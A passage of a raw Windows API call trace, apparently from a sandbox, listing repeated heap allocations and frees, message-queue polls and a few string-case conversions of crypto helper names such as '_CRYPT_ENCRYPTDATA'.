RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23b6) returned 0x48f2408 [0078.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.634] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23b6) returned 0x48f0048 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.634] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0078.634] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.634] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23b6) returned 0x48f0048 [0078.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0078.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23b6) returned 0x48f47c8 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0078.636] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0078.637] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0078.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0078.637] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0078.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0078.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0078.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0078.638] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0078.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.638] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0078.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0078.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.639] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0078.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0078.640] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0078.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0078.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0078.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0078.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0078.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0078.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0078.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0078.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0078.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0078.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0078.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0078.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, 